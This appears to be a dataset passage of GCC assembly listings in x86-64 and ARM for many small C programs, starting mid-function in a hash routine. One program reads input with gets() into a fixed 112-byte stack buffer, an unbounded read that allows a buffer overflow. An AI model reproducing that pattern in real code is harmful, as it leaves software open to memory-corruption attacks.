#-12] ldr r3, [fp, #-20] ror r3, r3, #28 ldr r2, [fp, #-12] eor r3, r3, r2 str r3, [fp, #-12] ldr r2, [fp, #-20] ldr r3, [fp, #-16] add r3, r2, r3 str r3, [fp, #-20] ldr r3, [fp, #-36] sub r3, r3, #12 str r3, [fp, #-36] ldr r3, [fp, #-8] add r3, r3, #12 str r3, [fp, #-8] .L141: ldr r3, [fp, #-36] cmp r3, #12 bhi .L142 ldr r3, [fp, #-36] cmp r3, #12 ldrls pc, [pc, r3, asl #2] b .L143 .L145: .word .L157 .word .L156 .word .L155 .word .L154 .word .L153 .word .L152 .word .L151 .word .L150 .word .L149 .word .L148 .word .L147 .word .L146 .word .L144 .L144: ldr r3, [fp, #-8] add r3, r3, #11 ldrb r3, [r3] @ zero_extendqisi2 mov r2, r3 ldr r3, [fp, #-12] add r3, r3, r2 str r3, [fp, #-12] .L146: ldr r3, [fp, #-8] add r3, r3, #10 ldrb r3, [r3] @ zero_extendqisi2 lsl r3, r3, #8 ldr r2, [fp, #-12] add r3, r2, r3 str r3, [fp, #-12] .L147: ldr r3, [fp, #-8] add r3, r3, #9 ldrb r3, [r3] @ zero_extendqisi2 lsl r3, r3, #16 ldr r2, [fp, #-12] add r3, r2, r3 str r3, [fp, #-12] .L148: ldr r3, [fp, #-8] add r3, r3, #8 ldrb r3, [r3] @ zero_extendqisi2 lsl r3, r3, #24 ldr r2, [fp, #-12] add r3, r2, r3 str r3, [fp, #-12] .L149: ldr r3, [fp, #-8] add r3, r3, #7 ldrb r3, [r3] @ zero_extendqisi2 mov r2, r3 ldr r3, [fp, #-20] add r3, r3, r2 str r3, [fp, #-20] .L150: ldr r3, [fp, #-8] add r3, r3, #6 ldrb r3, [r3] @ zero_extendqisi2 lsl r3, r3, #8 ldr r2, [fp, #-20] add r3, r2, r3 str r3, [fp, #-20] .L151: ldr r3, [fp, #-8] add r3, r3, #5 ldrb r3, [r3] @ zero_extendqisi2 lsl r3, r3, #16 ldr r2, [fp, #-20] add r3, r2, r3 str r3, [fp, #-20] .L152: ldr r3, [fp, #-8] add r3, r3, #4 ldrb r3, [r3] @ zero_extendqisi2 lsl r3, r3, #24 ldr r2, [fp, #-20] add r3, r2, r3 str r3, [fp, #-20] .L153: ldr r3, [fp, #-8] add r3, r3, #3 ldrb r3, [r3] @ zero_extendqisi2 mov r2, r3 ldr r3, [fp, #-16] add r3, r3, r2 str r3, [fp, #-16] .L154: ldr r3, [fp, #-8] add r3, r3, #2 ldrb r3, [r3] @ zero_extendqisi2 lsl r3, r3, #8 ldr r2, [fp, #-16] add r3, r2, r3 str r3, [fp, #-16] .L155: ldr r3, [fp, #-8] add r3, r3, #1 ldrb r3, [r3] @ zero_extendqisi2 lsl r3, r3, #16 ldr r2, [fp, #-16] add r3, r2, r3 str r3, [fp, #-16] .L156: ldr r3, [fp, #-8] ldrb r3, [r3] @ zero_extendqisi2 lsl r3, r3, #24 ldr r2, [fp, #-16] add r3, r2, r3 str r3, [fp, #-16] b .L143 .L157: ldr r3, [fp, #-12] b .L159 .L143: ldr r2, [fp, #-12] ldr r3, [fp, #-20] eor r3, r3, r2 str r3, [fp, #-12] ldr r3, [fp, #-20] ror r3, r3, #18 ldr r2, [fp, #-12] sub r3, r2, r3 str r3, [fp, #-12] ldr r2, [fp, #-16] ldr r3, [fp, #-12] eor r3, r3, r2 str r3, [fp, #-16] ldr r3, [fp, #-12] ror r3, r3, #21 ldr r2, [fp, #-16] sub r3, r2, r3 str r3, [fp, #-16] ldr r2, [fp, #-20] ldr r3, [fp, #-16] eor r3, r3, r2 str r3, [fp, #-20] ldr r3, [fp, #-16] ror r3, r3, #7 ldr r2, [fp, #-20] sub r3, r2, r3 str r3, [fp, #-20] ldr r2, [fp, #-12] ldr r3, [fp, #-20] eor r3, r3, r2 str r3, [fp, #-12] ldr r3, [fp, #-20] ror r3, r3, #16 ldr r2, [fp, #-12] sub r3, r2, r3 str r3, [fp, #-12] ldr r2, [fp, #-16] ldr r3, [fp, #-12] eor r3, r3, r2 str r3, [fp, #-16] ldr r3, [fp, #-12] ror r3, r3, #28 ldr r2, [fp, #-16] sub r3, r2, r3 str r3, [fp, #-16] ldr r2, [fp, #-20] ldr r3, [fp, #-16] eor r3, r3, r2 str r3, [fp, #-20] ldr r3, [fp, #-16] ror r3, r3, #18 ldr r2, [fp, #-20] sub r3, r2, r3 str r3, [fp, #-20] ldr r2, [fp, #-12] ldr r3, [fp, #-20] eor r3, r3, r2 str r3, [fp, #-12] ldr r3, [fp, #-20] ror r3, r3, #8 ldr r2, [fp, #-12] sub r3, r2, r3 str r3, [fp, #-12] ldr r3, [fp, #-12] .L159: mov r0, r3 add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .L161: .align 2 .L160: .word -559038737 .size hashbig, .-hashbig .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "18896.c" .intel_syntax noprefix .text .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "18896.c" .text .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "519060.c" .intel_syntax noprefix .text .globl add .type add, @function add: .LFB6: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov DWORD PTR -20[rbp], edi mov DWORD PTR -24[rbp], esi mov DWORD PTR -4[rbp], 10 mov edx, DWORD PTR -20[rbp] mov eax, DWORD PTR -24[rbp] add eax, edx mov DWORD PTR -4[rbp], eax mov eax, DWORD PTR -4[rbp] pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE6: .size add, .-add .section .rodata .LC0: .string "sum of %d + %d = %d\n" .text .globl main .type main, @function main: .LFB7: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 144 mov DWORD PTR -132[rbp], edi mov QWORD PTR -144[rbp], rsi mov rax, QWORD PTR fs:40 mov QWORD PTR -8[rbp], rax xor eax, eax mov rax, QWORD PTR -144[rbp] add rax, 8 mov rax, QWORD PTR [rax] mov rdi, rax call atoi@PLT mov DWORD PTR -124[rbp], eax mov rax, QWORD PTR -144[rbp] add rax, 16 mov rax, QWORD PTR [rax] mov rdi, rax call atoi@PLT mov DWORD PTR -120[rbp], eax lea rax, -112[rbp] mov rdi, rax mov eax, 0 call gets@PLT lea rax, -112[rbp] mov rdi, rax call puts@PLT mov edx, DWORD PTR -120[rbp] mov eax, DWORD PTR -124[rbp] mov esi, edx mov edi, eax call add mov DWORD PTR -116[rbp], eax mov ecx, DWORD PTR -116[rbp] mov edx, DWORD PTR -120[rbp] mov eax, DWORD PTR -124[rbp] mov esi, eax lea rdi, .LC0[rip] mov eax, 0 call printf@PLT mov eax, 0 mov rcx, QWORD PTR -8[rbp] sub rcx, QWORD PTR fs:40 je .L5 call __stack_chk_fail@PLT .L5: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE7: .size main, .-main .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "519060.c" .text .align 2 .global add .syntax unified .arm .fpu softvfp .type add, %function add: @ args = 0, pretend = 0, frame = 16 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 sub sp, sp, #20 str r0, [fp, #-16] str r1, [fp, #-20] mov r3, #10 str r3, [fp, #-8] ldr r2, [fp, #-16] ldr r3, [fp, #-20] add r3, r2, r3 str r3, [fp, #-8] ldr r3, [fp, #-8] mov r0, r3 add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .size add, .-add .section .rodata .align 2 .LC0: .ascii "sum of %d + %d = %d\012\000" .align 2 .LC1: .word __stack_chk_guard .text .align 2 .global main .syntax unified .arm .fpu softvfp .type main, %function main: @ args = 0, pretend = 0, frame = 128 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #128 str r0, [fp, #-128] str r1, [fp, #-132] ldr r3, .L6 ldr r3, [r3] str r3, [fp, #-8] mov r3,#0 ldr r3, [fp, #-132] add r3, r3, #4 ldr r3, [r3] mov r0, r3 bl atoi str r0, [fp, #-120] ldr r3, [fp, #-132] add r3, r3, #8 ldr r3, [r3] mov r0, r3 bl atoi str r0, [fp, #-116] sub r3, fp, #108 mov r0, r3 bl gets sub r3, fp, #108 mov r0, r3 bl puts ldr r1, [fp, #-116] ldr r0, [fp, #-120] bl add str r0, [fp, #-112] ldr r3, [fp, #-112] ldr r2, [fp, #-116] ldr r1, [fp, #-120] ldr r0, .L6+4 bl printf mov r3, #0 ldr r2, .L6 ldr r1, [r2] ldr r2, [fp, #-8] eors r1, r2, r1 mov r2, #0 beq .L5 bl __stack_chk_fail .L5: mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .L7: .align 2 .L6: .word .LC1 .word .LC0 .size main, .-main .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "650247.c" .intel_syntax noprefix .text .section .rodata .LC0: .string "%d, %d, %d" .text .globl main .type main, @function main: .LFB0: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 16 mov DWORD PTR -16[rbp], 0 mov DWORD PTR -12[rbp], 0 mov DWORD PTR -8[rbp], 0 jmp .L2 .L5: cmp DWORD PTR -4[rbp], 32 jne .L3 add DWORD PTR -16[rbp], 1 .L3: cmp DWORD PTR -4[rbp], 9 jne .L4 add DWORD PTR -12[rbp], 1 .L4: cmp DWORD PTR -4[rbp], 10 jne .L2 add DWORD PTR -8[rbp], 1 .L2: call getchar@PLT mov DWORD PTR -4[rbp], eax cmp DWORD PTR -4[rbp], -1 jne .L5 mov ecx, DWORD PTR -8[rbp] mov edx, DWORD PTR -12[rbp] mov eax, DWORD PTR -16[rbp] mov esi, eax lea rdi, .LC0[rip] mov eax, 0 call printf@PLT mov eax, 0 leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE0: .size main, .-main .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "650247.c" .text .section .rodata .align 2 .LC0: .ascii "%d, %d, %d\000" .text .align 2 .global main .syntax unified .arm .fpu softvfp .type main, %function main: @ args = 0, pretend = 0, frame = 16 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #16 mov r3, #0 str r3, [fp, #-20] mov r3, #0 str r3, [fp, #-16] mov r3, #0 str r3, [fp, #-12] b .L2 .L5: ldr r3, [fp, #-8] cmp r3, #32 bne .L3 ldr r3, [fp, #-20] add r3, r3, #1 str r3, [fp, #-20] .L3: ldr r3, [fp, #-8] cmp r3, #9 bne .L4 ldr r3, [fp, #-16] add r3, r3, #1 str r3, [fp, #-16] .L4: ldr r3, [fp, #-8] cmp r3, #10 bne .L2 ldr r3, [fp, #-12] add r3, r3, #1 str r3, [fp, #-12] .L2: bl getchar str r0, [fp, #-8] ldr r3, [fp, #-8] cmn r3, #1 bne .L5 ldr r3, [fp, #-12] ldr r2, [fp, #-16] ldr r1, [fp, #-20] ldr r0, .L7 bl printf mov r3, #0 mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .L8: .align 2 .L7: .word .LC0 .size main, .-main .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "110848.c" .intel_syntax noprefix .text .globl xx .bss .align 16 .type xx, @object .size xx, 16 xx: .zero 16 .globl x1 .section .data.rel.local,"aw" .align 8 .type x1, @object .size x1, 8 x1: .quad xx .text .globl test0 .type test0, @function test0: .LFB0: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov QWORD PTR -8[rbp], rdi mov rax, QWORD PTR -8[rbp] mov QWORD PTR 2[rax], 305419896 nop pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE0: .size test0, .-test0 .globl main .type main, @function main: .LFB1: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov rax, QWORD PTR x1[rip] mov rdi, rax call test0 mov rax, QWORD PTR xx[rip+2] cmp rax, 305419896 je .L3 call abort@PLT .L3: mov eax, 0 pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE1: .size main, .-main .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "110848.c" .text .comm xx,12,4 .global x1 .data .align 2 .type x1, %object .size x1, 4 x1: .word xx .text .align 2 .global test0 .syntax unified .arm .fpu softvfp .type test0, %function test0: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 sub sp, sp, #12 str r0, [fp, #-8] ldr r3, [fp, #-8] ldrh r2, [r3, #2] @ movhi mov r2, #0 orr r2, r2, #22016 orr r2, r2, #120 strh r2, [r3, #2] @ movhi ldrh r2, [r3, #4] @ movhi mov r2, #0 orr r2, r2, #4608 orr r2, r2, #52 strh r2, [r3, #4] @ movhi nop add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .size test0, .-test0 .align 2 .global main .syntax unified .arm .fpu softvfp .type main, %function main: @ args = 0, pretend = 0, frame = 0 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 ldr r3, .L5 ldr r3, [r3] mov r0, r3 bl test0 ldr r3, .L5+4 ldrh r2, [r3, #2] @ movhi lsl r2, r2, #16 lsr r2, r2, #16 ldrh r3, [r3, #4] @ movhi lsl r3, r3, #16 lsr r3, r3, #16 lsl r3, r3, #16 orr r3, r3, r2 mov r2, r3 ldr r3, .L5+8 cmp r2, r3 beq .L3 bl abort .L3: mov r3, #0 mov r0, r3 pop {fp, pc} .L6: .align 2 .L5: .word x1 .word xx .word 305419896 .size main, .-main .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "374387.c" .intel_syntax noprefix .text .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "374387.c" .text .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "593237.c" .intel_syntax noprefix .text .type add1, @function add1: .LFB6: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov DWORD PTR -4[rbp], edi mov eax, DWORD PTR -4[rbp] add eax, 1 pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE6: .size add1, .-add1 .type sub1, @function sub1: .LFB7: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov DWORD PTR -4[rbp], edi mov eax, DWORD PTR -4[rbp] sub eax, 1 pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE7: .size sub1, .-sub1 .type fact, @function fact: .LFB8: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 16 mov DWORD PTR -4[rbp], edi cmp DWORD PTR -4[rbp], 0 jne .L6 mov eax, 1 jmp .L7 .L6: mov eax, DWORD PTR -4[rbp] sub eax, 1 mov edi, eax call fact imul eax, DWORD PTR -4[rbp] .L7: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE8: .size fact, .-fact .type fib, @function fib: .LFB9: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 push rbx sub rsp, 24 .cfi_offset 3, -24 mov DWORD PTR -20[rbp], edi cmp DWORD PTR -20[rbp], 0 jne .L9 mov eax, 0 jmp .L10 .L9: cmp DWORD PTR -20[rbp], 1 jne .L11 mov eax, 1 jmp .L10 .L11: mov eax, DWORD PTR -20[rbp] sub eax, 1 mov edi, eax call fib mov ebx, eax mov eax, DWORD PTR -20[rbp] sub eax, 2 mov edi, eax call fib add eax, ebx .L10: mov rbx, QWORD PTR -8[rbp] leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE9: .size fib, .-fib .type zerohuh, @function zerohuh: .LFB10: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov DWORD PTR -4[rbp], edi cmp DWORD PTR -4[rbp], 0 sete al movzx eax, al pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE10: .size zerohuh, .-zerohuh .type mul2, @function mul2: .LFB11: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov QWORD PTR -8[rbp], rdi mov rax, QWORD PTR -8[rbp] mov eax, DWORD PTR [rax] lea edx, [rax+rax] mov rax, QWORD PTR -8[rbp] mov DWORD PTR [rax], edx mov rax, QWORD PTR -8[rbp] pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE11: .size mul2, .-mul2 .globl foo .type foo, @function foo: .LFB12: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 32 mov edi, 4 call malloc@PLT mov QWORD PTR -24[rbp], rax mov esi, 4 mov edi, 5 call calloc@PLT mov QWORD PTR -16[rbp], rax mov DWORD PTR -28[rbp], 0 jmp .L17 .L18: mov eax, DWORD PTR -28[rbp] cdqe lea rdx, 0[0+rax*4] mov rax, QWORD PTR -16[rbp] add rax, rdx mov edx, DWORD PTR -28[rbp] add edx, 1 mov DWORD PTR [rax], edx add DWORD PTR -28[rbp], 1 .L17: cmp DWORD PTR -28[rbp], 4 jle .L18 mov rdx, QWORD PTR -16[rbp] mov rax, QWORD PTR -24[rbp] mov rsi, rdx mov rdi, rax call sus@PLT mov QWORD PTR -8[rbp], rax mov rax, QWORD PTR -8[rbp] leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE12: .size foo, .-foo .globl bar .type bar, @function bar: .LFB13: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 32 mov edi, 4 call malloc@PLT mov QWORD PTR -24[rbp], rax mov esi, 4 mov edi, 5 call calloc@PLT mov QWORD PTR -16[rbp], rax mov DWORD PTR -28[rbp], 0 jmp .L21 .L22: mov eax, DWORD PTR -28[rbp] cdqe lea rdx, 0[0+rax*4] mov rax, QWORD PTR -16[rbp] add rax, rdx mov edx, DWORD PTR -28[rbp] add edx, 1 mov DWORD PTR [rax], edx add DWORD PTR -28[rbp], 1 .L21: cmp DWORD PTR -28[rbp], 4 jle .L22 mov rdx, QWORD PTR -16[rbp] mov rax, QWORD PTR -24[rbp] mov rsi, rdx mov rdi, rax call sus@PLT mov QWORD PTR -8[rbp], rax add QWORD PTR -8[rbp], 16 mov rax, QWORD PTR -8[rbp] leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE13: .size bar, .-bar .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "593237.c" .text .align 2 .syntax unified .arm .fpu softvfp .type add1, %function add1: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 sub sp, sp, #12 str r0, [fp, #-8] ldr r3, [fp, #-8] add r3, r3, #1 mov r0, r3 add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .size add1, .-add1 .align 2 .syntax unified .arm .fpu softvfp .type sub1, %function sub1: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 sub sp, sp, #12 str r0, [fp, #-8] ldr r3, [fp, #-8] sub r3, r3, #1 mov r0, r3 add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .size sub1, .-sub1 .align 2 .syntax unified .arm .fpu softvfp .type fact, %function fact: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #8 str r0, [fp, #-8] ldr r3, [fp, #-8] cmp r3, #0 bne .L6 mov r3, #1 b .L7 .L6: ldr r3, [fp, #-8] sub r3, r3, #1 mov r0, r3 bl fact mov r2, r0 ldr r3, [fp, #-8] mul r3, r2, r3 .L7: mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .size fact, .-fact .align 2 .syntax unified .arm .fpu softvfp .type fib, %function fib: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 push {r4, fp, lr} add fp, sp, #8 sub sp, sp, #12 str r0, [fp, #-16] ldr r3, [fp, #-16] cmp r3, #0 bne .L9 mov r3, #0 b .L10 .L9: ldr r3, [fp, #-16] cmp r3, #1 bne .L11 mov r3, #1 b .L10 .L11: ldr r3, [fp, #-16] sub r3, r3, #1 mov r0, r3 bl fib mov r4, r0 ldr r3, [fp, #-16] sub r3, r3, #2 mov r0, r3 bl fib mov r3, r0 add r3, r4, r3 .L10: mov r0, r3 sub sp, fp, #8 @ sp needed pop {r4, fp, pc} .size fib, .-fib .align 2 .syntax unified .arm .fpu softvfp .type zerohuh, %function zerohuh: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 sub sp, sp, #12 str r0, [fp, #-8] ldr r3, [fp, #-8] cmp r3, #0 moveq r3, #1 movne r3, #0 and r3, r3, #255 mov r0, r3 add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .size zerohuh, .-zerohuh .align 2 .syntax unified .arm .fpu softvfp .type mul2, %function mul2: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 sub sp, sp, #12 str r0, [fp, #-8] ldr r3, [fp, #-8] ldr r3, [r3] lsl r2, r3, #1 ldr r3, [fp, #-8] str r2, [r3] ldr r3, [fp, #-8] mov r0, r3 add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .size mul2, .-mul2 .align 2 .global foo .syntax unified .arm .fpu softvfp .type foo, %function foo: @ args = 0, pretend = 0, frame = 16 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #16 mov r0, #4 bl malloc mov r3, r0 str r3, [fp, #-16] mov r1, #4 mov r0, #5 bl calloc mov r3, r0 str r3, [fp, #-12] mov r3, #0 str r3, [fp, #-20] b .L17 .L18: ldr r3, [fp, #-20] lsl r3, r3, #2 ldr r2, [fp, #-12] add r3, r2, r3 ldr r2, [fp, #-20] add r2, r2, #1 str r2, [r3] ldr r3, [fp, #-20] add r3, r3, #1 str r3, [fp, #-20] .L17: ldr r3, [fp, #-20] cmp r3, #4 ble .L18 ldr r1, [fp, #-12] ldr r0, [fp, #-16] bl sus str r0, [fp, #-8] ldr r3, [fp, #-8] mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .size foo, .-foo .align 2 .global bar .syntax unified .arm .fpu softvfp .type bar, %function bar: @ args = 0, pretend = 0, frame = 16 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #16 mov r0, #4 bl malloc mov r3, r0 str r3, [fp, #-16] mov r1, #4 mov r0, #5 bl calloc mov r3, r0 str r3, [fp, #-12] mov r3, #0 str r3, [fp, #-20] b .L21 .L22: ldr r3, [fp, #-20] lsl r3, r3, #2 ldr r2, [fp, #-12] add r3, r2, r3 ldr r2, [fp, #-20] add r2, r2, #1 str r2, [r3] ldr r3, [fp, #-20] add r3, r3, #1 str r3, [fp, #-20] .L21: ldr r3, [fp, #-20] cmp r3, #4 ble .L22 ldr r1, [fp, #-12] ldr r0, [fp, #-16] bl sus str r0, [fp, #-8] ldr r3, [fp, #-8] add r3, r3, #8 str r3, [fp, #-8] ldr r3, [fp, #-8] mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .size bar, .-bar .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "573771.c" .intel_syntax noprefix .text .globl main .type main, @function main: .LFB0: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 .L2: jmp .L2 .cfi_endproc .LFE0: .size main, .-main .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "573771.c" .text .align 2 .global main .syntax unified .arm .fpu softvfp .type main, %function main: @ args = 0, pretend = 0, frame = 0 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 .L2: b .L2 .size main, .-main .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
